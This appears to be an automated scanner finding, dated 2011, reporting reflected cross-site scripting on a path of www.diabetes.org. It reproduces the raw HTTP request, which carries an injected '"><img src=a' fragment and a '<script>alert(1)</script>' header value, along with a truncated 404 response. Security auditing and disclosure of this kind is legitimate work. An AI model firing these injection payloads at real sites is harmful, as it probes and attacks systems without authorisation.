1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.diabetes.org |
Path: | /favicon.ico |
GET /favicon.ico66ee7"><img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.diabetes.org Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: Resin/3.1.8 Content-Type: text/html; charset=UTF-8 Date: Fri, 01 Apr 2011 02:24:43 GMT Set-Cookie: NSC_dnt_901_qvc Content-Length: 70336 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head ...[SNIP]... <a href="http://main ...[SNIP]... |